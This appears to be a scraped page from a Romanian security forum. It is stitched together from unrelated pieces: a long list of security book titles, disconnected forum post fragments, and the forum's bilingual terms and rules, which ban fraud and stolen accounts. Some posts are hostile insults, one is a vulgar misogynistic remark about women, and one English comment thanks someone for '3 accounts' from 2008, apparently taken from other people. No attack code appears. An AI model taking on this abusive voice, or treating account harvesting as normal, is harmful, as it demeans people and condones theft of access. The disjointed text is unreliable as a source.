Hardware Security, Design, Threats, and Safeguards Homeland Security and Private Sector Business, Corporations' Role in Critical Infrastructure Protection Homeland Security Handbook How to Develop and Implement a Security Master Plan Industrial Espionage, Developing a Counterespionage Program Information Assurance Architecture Information Security Architecture, An Integrated Approach to Security in the Organization Information Security Architecture, An Integrated Approach to Security in the Organization, Second Edition Information Security Cost Management Information Security Fundamentals, Second Edition Information Security Governance Simplified, From the Boardroom to the Keyboard Information Security Management Handbook on CD-ROM, 2006 Edition Information Security Management Handbook, Fifth Edition, Volume 3 Information Security Management Handbook, Four Volume Set Information Security Management Handbook, Fourth Edition, Volume 4 Information Security Management Handbook, Sixth Edition Information Security Management Handbook, Sixth Edition, Volume 2 Information Security Management Handbook, Sixth Edition, Volume 3 Information Security Management Handbook, Sixth Edition, Volume 4 Information Security Management Handbook, Sixth Edition, Volume 5 Information Security Management Handbook, Sixth Edition, Volume 6 Information Security Management Handbook, Volume 2 Insider Computer Fraud, An In-depth Framework for Detecting and Defending against Insider IT Attacks Intelligent Network Video, Understanding Modern Video Surveillance Systems Intelligent Video Surveillance, Systems and Technology Investigations in the Workplace, Second Edition Investigator's Guide to Steganography Iris Biometric Model for Secured Network Access IT Auditing and Sarbanes-Oxley Compliance, Key Strategies for Business Improvement IT Security Governance Guidebook with Security Program Metrics on CD-ROM Lattice Basis Reduction, An Introduction to the LLL Algorithm and Its Applications Machine Learning Forensics for Law Enforcement, Security, and Intelligence Malicious Bots, An Inside Look into the Cyber-Criminal Underground of the Internet Managing A Network Vulnerability Assessment Managing an Information Security and Privacy Awareness and Training Program Managing an Information Security and Privacy Awareness and Training Program, Second Edition Managing Risk and Security in Outsourcing IT Services, Onshore, Offshore and the Cloud Managing the Insider Threat, No Dark Corners Managing Trust in Cyberspace Mechanics of User Identification and Authentication, Fundamentals of Identity Management Multilevel Modeling of Secure Systems in QoP-ML Multilevel Security for Relational Databases Multimedia Content Encryption, Techniques and Applications Multimedia Encryption and Authentication Techniques and Applications Multimedia Security Handbook Multimedia Security, Watermarking, Steganography, and Forensics Multimedia Watermarking Techniques and Applications Multiple-Base Number System, Theory and Applications Network and Application Security, Fundamentals and Practices Network Anomaly Detection, A Machine Learning Perspective Network Attacks and Defenses, A Hands-on Approach Network Perimeter Security, Building Defense In-Depth Network Security Technologies New Directions of Modern Cryptography Noiseless Steganography, The Key to Covert Communications Official (ISC)2 Guide to the CISSP CBK Official (ISC)2 Guide to the CISSP CBK, Second Edition Official (ISC)2 Guide to the CISSP CBK, Third Edition Official (ISC)2 Guide to the CISSP Exam Official (ISC)2 Guide to the CSSLP Official (ISC)2 Guide to the CSSLP CBK, Second Edition Official (ISC)2 Guide to the HCISPP CBK Official (ISC)2 Guide to the SSCP CBK Official (ISC)2 Guide to the SSCP CBK, Second Edition Official (ISC)2® Guide to the CAP® CBK®, Second Edition Official (ISC)2® Guide to the CCFP CBK Official (ISC)2® Guide to the ISSAP® CBK Official (ISC)2® Guide to the ISSAP® CBK, Second Edition Official (ISC)2® Guide to the ISSEP® CBK®, Second Edition Official (ISC)2® Guide to the ISSMP® CBK® Optical Coding Theory with Prime Oracle Identity Management, Governance, Risk, and Compliance Architecture, Third Edition PCI Compliance, The Definitive Guide Pearls of Discrete Mathematics Physical Security and Safety, A Field Guide for the Practitioner Practical Cryptography, Algorithms and Implementations Using C++ Practical Hacking Techniques and Countermeasures Practical Risk Management for the CIO PRAGMATIC Security Metrics, Applying Metametrics to Information Security Privacy-Aware Knowledge Discovery, Novel Applications and New Techniques Profiling Hackers, The Science of Criminal Profiling as Applied to the World of Hacking Protocols for Secure Electronic Commerce, Second Edition Public Key Infrastructure, Building Trusted Applications and Web Services Quantum Communications and Cryptography RC4 Stream Cipher and Its Variants Responsive Security, Be Ready to Be Secure RSA and Public-Key Cryptography Secure and Resilient Software Development Secure and Resilient Software, Requirements, Test Cases, and Testing Methods Secure Computers and Networks, Analysis, Design, and Implementation Secure Data Provenance and Inference Control with Semantic Web Secure Internet Practices, Best Practices for Securing Systems in the Internet and e-Business Age Secure Java, For Web Application Development Secure Semantic Service-Oriented Systems Securing and Controlling Cisco Routers Securing Cloud and Mobility, A Practitioner's Guide Securing Converged IP Networks Securing E-Business Applications and Communications Securing Systems, Applied Security Architecture and Threat Models Securing Windows NT/2000, From Policies to Firewalls Security and Policy Driven Computing Security and Privacy in Smart Grids Security De-Engineering, Solving the Problems in Information Risk Management Security for Service Oriented Architectures Security for Wireless Sensor Networks using Identity-Based Cryptography Security in an IPv6 Environment Security in Distributed, Grid, Mobile, and Pervasive Computing Security in RFID and Sensor Networks Security Management, A Critical Thinking Approach Security of Mobile Communications Security Patch Management Security Software Development, Assessing and Managing Security Risks Security Strategy, From Requirements to Reality Security without Obscurity, A Guide to Confidentiality, Authentication, and Integrity Smart Grid Security, An End-to-End View of Security in the New Electrical Grid Software Deployment, Updating, and Patching Software Test Attacks to Break Mobile and Embedded Devices Standard for Auditing Computer Applications, Second Edition Statistical Methods in Computer Security Strategic Information Security Surviving Security, How to Integrate People, Process, and Technology Testing Code Security The ABCs of LDAP, How to Install, Run, and Administer LDAP Services The CISO Handbook, A PRACTICAL GUIDE TO SECURING YOUR COMPANY The Complete Book of Data Anonymization, From Planning to Implementation The Definitive Guide to Complying with the HIPAA/HITECH Privacy and Security Rules The Ethical Hack, A Framework for Business Value Penetration Testing The Hacker's Handbook, The Strategy Behind Breaking into and Defending Networks The Laws of Software Process, A New Model for the Production and Management of Software The Practical Guide to HIPAA Privacy and Security Compliance The Practical Guide to HIPAA Privacy and Security Compliance, Second Edition The Privacy Papers, Managing Technology, Consumer, Employee and Legislative Actions The Security Risk Assessment Handbook, A Complete Guide for Performing Security Risk Assessments The Security Risk Assessment Handbook, A Complete Guide for Performing Security Risk Assessments, Second Edition The State of the Art in Intrusion Prevention and Detection The Total CISSP Exam Prep Book, Practice Questions, Answers, and Test Taking Tips and Techniques Trade Secret Theft, Industrial Espionage, and the China Threat Unauthorized Access, The Crisis in Online Privacy and Security Understanding Surveillance Technologies, Spy Devices, Privacy, History & Applications, Second Edition Understanding Surveillance Technologies, Spy Devices, Their Origins & Applications UNIX Administration, A Comprehensive Sourcebook for Effective Systems & Network Management Using the Common Criteria for IT Security Evaluation Vein Pattern Recognition, A Privacy-Enhancing Biometric Verification of Computer Codes in Computational Science and Engineering Visual Cryptography and Secret Image Sharing Vulnerability Management Watermarking Systems Engineering, Enabling Digital Assets Security and Other Applications Web Security, A WhiteHat Perspective What Every Engineer Should Know About Cyber Security and Digital Forensics Windows Networking Tools, The Complete Guide to Management, Troubleshooting, and Security Wireless Crime and Forensic Investigation Wireless Multimedia Communication Systems, Design, Analysis, and Implementation Wireless Security

Bun pentru cazurile in care cheia e un string. Daca e cheie RSA, nasol. @TheTime alternativa la cel scris in C#.

Pac, pac, i-au ciuruit http://www.nydailynews.com/entertainment/tv/arrests-made-game-thrones-episode-leak-article-1.3410972 Probabil nu sunt aceeasi entitate care au cerut meleoanele... dar totusi. #indieni #foame

A fost publicata agenda. https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2017#tab=Conference_0101_talks https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2017#tab=Conference_1010_talks

Hirens boot ... ai acolo tot ceea ce ai nevoie.

[RO] Termeni si conditii - Administratorii acestui website nu isi asuma nicio responsabilitate pentru continutul acestui forum! Fiecare utilizator este responsabil pentru continutul creat! - Administratorii nu sunt responsabili pentru problemele aparute in urma folosirii informatiilor de pe acest website! - Administratorii acestui website nu isi asuma nicio responsabilitate pentru pagubele rezultate in urma vanzarii, cumpararii sau schimbului de bunuri sau servicii pe acest website! - Avem toleranta 0 pentru frauda sau informatii care faciliteaza frauda online sau bancara, inclusiv prin mesajele private (skimming, CC-uri, root-uri etc.). Orice abatere de la aceasta regula se pedepseste prin interzicerea permanenta pe website, iar datele voastre vor fi oferite organelor competente dac? ni se va cere acest lucru. De asemenea, administratorii isi rezerva dreptul de a interzice utilizatorilor accesul pe website in urma oricarei posibile activitati care pot fi legate de frauda online sau bancara. - Se interzice publicarea de continut ilegal sau fara drepturi de autor! Este interzisa publicarea de date cu caracter personal, conturi care nu va apartin, informatii de acces la diferite servere sau website-uri sau orice altceva care nu va apartine si care nu respecta legislatia in vigoare! - Acest website nu gazduieste fisiere fara drepturi de autor ci doar legaturi catre diferite servicii externe. Administratorii acestui website nu isi asuma responsabilitatea pentru continutul prezent pe servicii externe. Daca sunteti posesorii drepturilor de autor pentru informatii publicate pe acest website, luati legatura cu unul dintre administratori pentru eliminarea continutului. - Prin accesarea acestui website sunteti de acord cu termenii si conditiile si cu regulamentul acestui website! [RO] Avertisemente, interzicere temporara sau permanenta In urma abaterii de la regulile acestui forum, utilizatorii pot fi avertizati (warn) sau li se poate interzice accesul pe forum (ban) temporar sau permanent. Administratorii si moderatorii acestui website sunt cei care decid pedeapsele pentru incalcarea regulilor. Daca considerati ca pedeapsa (warn sau ban) nu este justificata, luati legatura cu unul dintre administratorii acestui website. Actiuni pentru care veti primi un avertisment (warn): - Off-topic - Daca va abateti de la tema de discutie a unui subiect - Post dublu - Nu faceti mai multe posturi consecutive - Post inutil - Nu potati doar de dragul de a posta ci doar daca aveti ceva util de spus - Redeschidere topic - Verificati daca ultimului post intr-un topic, daca nu s-a mai postat de cativa ani nu postati nici voi - Insultare membru - Fara atacuri la persoana sau injuraturi - Nume inadecvat - Pentru un topic, alegeti un titlu care sa rezume postul - Limbaj inadecvat - Respectati regulile gramaticale, fara sh, tz sau altceva, nu sunteti pe IRC - Link-uri cu referral - Fara adf.ly sau alte mizerii - Crearea unui cont pe forum doar pentru a cere invitatii pe trackere, alte forumuri, etc. - Altul: orice abatere care nu se incadreaza in aceste categorii Pentru multiple avertismente rezultatul poate fi banarea temporara sau permanenta, astfel: - pentru 3 avertismente - ban 5 zile - pentru 4 avertismente - ban 30 de zile - pentru 5 avertismente - ban permanent [RO] Reguli 1. Nu postati si nu cereti root-uri, vpn-uri, smtp-uri etc. 2. Oferiti credite si dati sursele originale. Daca veti copia un link sau un tutorial de pe alt site/forum/blog, oferiti credite autorului initial. 3. Unele categorii (ca Free Stuff sau RST Market) au regulament intern. Verifica daca exista un regulament sticky inainte de a posta intr-o anumita categorie. 4. Fiecare tutorial, program sau lucruri asemanatoare trebuie insotite de o descriere in romana sau engleza. Linkurile catre programe trebuie sa fie catre site-ul oficial al acelui program sau tutorial. 5. Publicarea datelor personale sau tentative de acest gen ale oricarui individ duce la ban permanent. 6. Nu cereti VIP, Moderator sau alte ranguri pentru ca nu le veti primi. Daca vom avea nevoie va vom cauta noi. 7. Un moderator/administrator are dreptul sa zboare pe oricine doreste de pe forum, cu atat mai mult daca consider? ca acea persoan? este inutila pentru forum. 8. Exista buton de report post. Nu atrageti aten?ia prin mesaje publice pentru ca veti primi avertisment. Eventual dati mesaj privat acelui utilizator. 9. Nu aveti voie sa faceti proiecte sau prezentari in numele RST fara acordul unuia dintre administratori. 10. Nu aveti voie sa injurati pe chat sau sa faceti atacuri la persoana. Nerespectarea acestei reguli duce la sanctionarea prin Kick si ulterior prin BAN pe chat. 11. Crearea a mai mult de 1 cont pe persoana duce automat la banarea tuturor conturilor. 12. Postarea de vulnerabilitati in site-uri care nu au un program bug-bounty si care nu ofera un cadru legal pentru raportarea vulnerabilitatilor este interzisa. Administratorii RST au dreptul de a modifica oricand Termenii si conditiile si Regulamentul acestui website fara o notificare in prealabil. [RO] Regulament categorii: Free stuff - Nu se accepta root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta conturi sau acces la diferite servicii care nu va apartin RST Market - Nu se accepta vanzarea, cumpararea sau schimbul de date care faciliteteaza frauda online sau bancara - Nu se accepta vanzarea, cumpararea sau schimbul de root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta vanzarea, cumpararea sau schimbul de conturi care nu va apartin [EN] Terms and conditions - The administrators of this website do not take any responsibility for the content of the website! Each user is responsible for the created content! - The administrators are not responsible on any problem resulted by using the information available on this website! - The administrators of this website do not take any responsibility for the loss resulted by selling, buying or exchanging information on this website! - We do no tolerate fraud or any information that facilitates online fraud or banking fraud, including by private messaging system (skimming, CCs, roots etc.)! Any abuse on this rule is punished with permanent ban on this website and your personal data will be offered to the authorities if they request us this. Also, the administrators of this forum are allowed to ban users for any activity that can be related to online fraud or banking fraud. - It is not permitted to create illegal content or without copyright! It is forbidden to publish private personal date, stolen accounts, access information to different websites or services that do not belong to you or any information that does not respect the legislation! - This website does not host files without copyright, it only hosts links to external service providers. The administrators of this website do not take the responsibility for the content available on external services. If you are the copyright folder for information provided on the website, please contact one of the administrators to remove the content. - By accessing this website you agree the terms and conditions and the rules of this website! [EN] Warnings, temporary and permanent ban reasons Not following the forum rules may result in warnings, temporary ban or permanent ban on this website. The administrators and the moderators of this website decide the punishment for each abuse of the rules. If you consider that the punishment is not correct, please contact one of the administrators of this website. You can be warned for the following actions: - Off-topic - if you deviate from the topic subject - Double post - If you have multiple consecutive posts - Useless post - If you post without any reason and the post is not useful to the topic subject - Reopen thread - Check the last post date on a thread and do not post there if it is very old - Insulted member - Do not attack and insult other members - Improper name - Please use descriptive thread subjects - Improper language - You are not on IRC, please be as correctly grammatical as possible - Referral links - Do not post adf.ly or other stupid referral links - Creating an account on the forum only to ask for invitations on trackers, other forums, etc. - Other - Any other abuse of the forum rules For multiple warnings, the result can be temporary or permanent ban: - for 3 warnings - ban 5 days - for 4 warnings - ban 30 days - for 5 warnings - permanent ban [EN] Rules 1. Do not post or request root, vps, smtp or anything else. 2. Specify the original sources for your posts when you post a tool or a tutorial from other website. 3. Some categories (such as Free stuff or RST Market) have internal rules. Follow that rules when you post in that categories. 4. Each tool or tutorial must contain at least a small description in English or Romanian. Links to programs must be links to the official site of those programs. 5. Publishing or trying to publish private personal information will result in permanent ban. 6. Do not request VIP or Moderator access, you will not get it. If we need you, we will search you. 7. A moderator or an administrator have the right to ban anyone on this forum if he considers that the user is useless for the forum. 8. There is a "Report" button, please use it, do not post to warn other users about their mistake. 9. You are not allowed to create tools or write articles in the name of RST without the approval of one of the administrators. 10. You are not allowed to attack or insult other persons on that chat and on the forum. 11. If you have more than one account you can be banned on all your accounts. 12. Posting vulnerabilities i websites that do not have a bug bounty program is forbidden. RST staff have the right to modify at any time the Terms and conditions and the rules of this forum without a notification. [EN] Category rules Free stuff: - It is forbidden to post or request root, vps, smtp or anything else that do not belong to you - It is forbidden to post accounts for different websites or services that do not belong to you RST Market: - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud - It is forbidden to sell, buy or exchange roots, vps, smtp, rdp or anything else that do not belong to you - It is forbidden to sell, buy or exchange accounts that do not belong to you

De-aia imi e frica sa ma insor. Daca nu te-a inselat femeia,inseamna ca ori n-a avut ocazia,ori inca n-ai aflat,ca-n rest sunt toate la fel futule-n gat de japite.

Salut, eu ti-am prezentat optiunea mea, nu iti convine treci mai departe. Acest lucru este valabil pentru toti, este o treaba de o ora, iar cine este pasionat de asa ceva poate face acest lucru mult mai repede. PS* Incercam sa ne pastram calmul si sa nu sarim in cap cu "Ce putin ofera asta...", nu va convine treceti peste si atat, asta este oferta mea eu va respect pe voi iar voi la randul vostru ar trebui sa faceti acelas lucru, sunt sigur ca daca ati avea o afacere online incercati sa scoateti cat mai mult profit. #OnTopic Zi faina! Astept in continuare PM de la cei interesati.

Esti spart omule, ti-am dat de inteles ca nu ma intereseaza ceea ce zici, ce te mai complici. UP*

Man, stai usor ca nu ne cunoastem, hai sa nu ne injuram cand putem folosi un limbaj diplomant. Singurul sclav dupa limbaj de aici esti doar tu. Te mai si superi ca te cumpar cu mai mult de cat ai fost vandut de parintii tai.

wow i got 3 accounts from this and its never been used...it dates backs as far as 2008..tnx for this...

Raspunsul tau nu este pe subiect, nici macar nu am vorbit cu tine pana acum. De unde stii tu ca tie iti ceream 1 euro si nu 0.5 Stai jos, nu te-a bagat nimeni in seama.

Delete